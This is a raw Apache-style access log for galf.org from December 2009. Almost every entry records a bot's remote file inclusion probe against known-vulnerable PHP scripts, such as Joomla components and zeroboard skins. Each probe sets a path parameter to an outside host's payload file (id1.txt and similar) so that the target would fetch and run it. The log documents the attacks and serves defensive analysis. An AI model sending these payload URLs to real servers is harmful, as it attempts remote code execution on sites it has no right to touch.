64.34.111.74 - - [21/Dec/2009:02:18:38 -0800] "GET /logs/access_090921.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:18:49 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:18:49 -0800] "GET /logs/access_090706.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:18:49 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.11.117.195 - - [21/Dec/2009:02:19:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.11.117.195 - - [21/Dec/2009:02:19:36 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.11.117.195 - - [21/Dec/2009:02:19:36 -0800] "GET /logs/access_091109.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.250.149.132 - - [21/Dec/2009:02:19:42 -0800] "GET /index.php?p=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
210.250.149.132 - - [21/Dec/2009:02:19:43 -0800] "GET /logs//index.php?p=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:19:57 -0800] "GET /index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:19:57 -0800] "GET /logs//index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:19:57 -0800] "GET /logs/access_090629.log//index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:20:21 -0800] "GET /index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:20:21 -0800] "GET /logs/access_090706.log//index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:20:21 -0800] "GET /logs//index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:20:32 -0800] "GET /logs/access_090706.log//index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:21:10 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:21:10 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:21:10 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:21:31 -0800] "GET /logs/access_090921.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:22:11 -0800] "GET /logs/access_090629.log//index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:22:11 -0800] "GET /index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:22:11 -0800] "GET /logs//index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:22:37 -0800] "GET /logs/access_090706.log//index2.php?x=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:22:39 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:22:39 -0800] "GET /skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:22:39 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:23:13 -0800] "GET /skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:23:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:23:13 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:23:40 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:23:40 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:23:40 -0800] "GET /logs/access_091109.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.126 - - [21/Dec/2009:02:24:02 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.126 - - [21/Dec/2009:02:24:02 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.126 - - [21/Dec/2009:02:24:04 -0800] "GET /logs/access_091109.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.11.117.195 - - [21/Dec/2009:02:24:34 -0800] "GET /logs/access_090706.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:24:53 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [21/Dec/2009:02:24:53 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [21/Dec/2009:02:24:53 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:25:25 -0800] "GET /logs/access_090622.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.126 - - [21/Dec/2009:02:25:50 -0800] "GET /logs/access_091019.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:26:06 -0800] "GET /logs/access_090601.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.11.117.195 - - [21/Dec/2009:02:26:55 -0800] "GET /logs/access_091019.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.126 - - [21/Dec/2009:02:26:56 -0800] "GET /logs/access_090706.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.11.117.195 - - [21/Dec/2009:02:27:05 -0800] "GET /logs/access_090601.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:28:19 -0800] "GET /skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:28:19 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:28:19 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [21/Dec/2009:02:28:32 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [21/Dec/2009:02:28:32 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [21/Dec/2009:02:28:32 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [21/Dec/2009:02:28:51 -0800] "GET /logs/access_090921.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [21/Dec/2009:02:29:02 -0800] "GET /logs/access_090921.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [21/Dec/2009:02:29:02 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [21/Dec/2009:02:29:02 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:29:38 -0800] "GET /logs/access_090525.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:29:43 -0800] "GET /logs/access_091116.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [21/Dec/2009:02:31:36 -0800] "GET /logs/access_090914.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [21/Dec/2009:02:31:36 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [21/Dec/2009:02:31:36 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [21/Dec/2009:02:32:10 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [21/Dec/2009:02:32:10 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [21/Dec/2009:02:32:10 -0800] "GET /logs/access_090914.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [21/Dec/2009:02:32:14 -0800] "GET /logs/access_090629.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:32:23 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:32:23 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:32:23 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:02 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:21 -0800] "GET /logs//appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:21 -0800] "GET /appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:21 -0800] "GET /logs/access_091019.log//appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:33:24 -0800] "GET /logs/access_090921.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:36 -0800] "GET /logs/access_091019.log//appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:36 -0800] "GET /appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:36 -0800] "GET /logs//appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.168.226.126 - - [21/Dec/2009:02:33:36 -0800] "GET /logs/access_091109.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:41 -0800] "GET /logs//appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:41 -0800] "GET /logs/access_091019.log//appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:41 -0800] "GET /appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:33:42 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:34:17 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:34:17 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:34:19 -0800] "GET /logs/access_090921.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:35:40 -0800] "GET /logs/access_091102.log/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:35:54 -0800] "GET /logs/access_091102.log/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [21/Dec/2009:02:36:02 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:36:30 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:36:30 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:36:34 -0800] "GET /logs/access_090706.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:36:40 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:37:07 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:37:07 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:37:09 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.79 - - [21/Dec/2009:02:37:15 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
209.202.168.79 - - [21/Dec/2009:02:37:16 -0800] "GET /logs/access_090504.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:37:28 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:37:31 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:37:32 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:39:02 -0800] "GET /logs/access_090921.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [21/Dec/2009:02:39:42 -0800] "GET /logs/access_090921.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:40:32 -0800] "GET /logs/access.log%20%20//?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.146.72 - - [21/Dec/2009:02:40:32 -0800] "GET /?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
110.45.146.72 - - [21/Dec/2009:02:40:32 -0800] "GET /logs//?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
209.202.168.79 - - [21/Dec/2009:02:40:59 -0800] "GET /logs/access_090427.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:41:07 -0800] "GET /?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:41:07 -0800] "GET /logs/access_090928.log%20%20//?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:41:07 -0800] "GET /logs//?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [21/Dec/2009:02:41:14 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [21/Dec/2009:02:41:14 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [21/Dec/2009:02:41:14 -0800] "GET /logs/access_090706.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:41:30 -0800] "GET /?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:41:30 -0800] "GET /logs/access_091012.log%20%20//?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:41:30 -0800] "GET /logs//?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [21/Dec/2009:02:43:03 -0800] "GET /?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
110.45.146.72 - - [21/Dec/2009:02:43:03 -0800] "GET /logs/access.log%20%20//?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.146.72 - - [21/Dec/2009:02:43:03 -0800] "GET /logs//?_zb_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org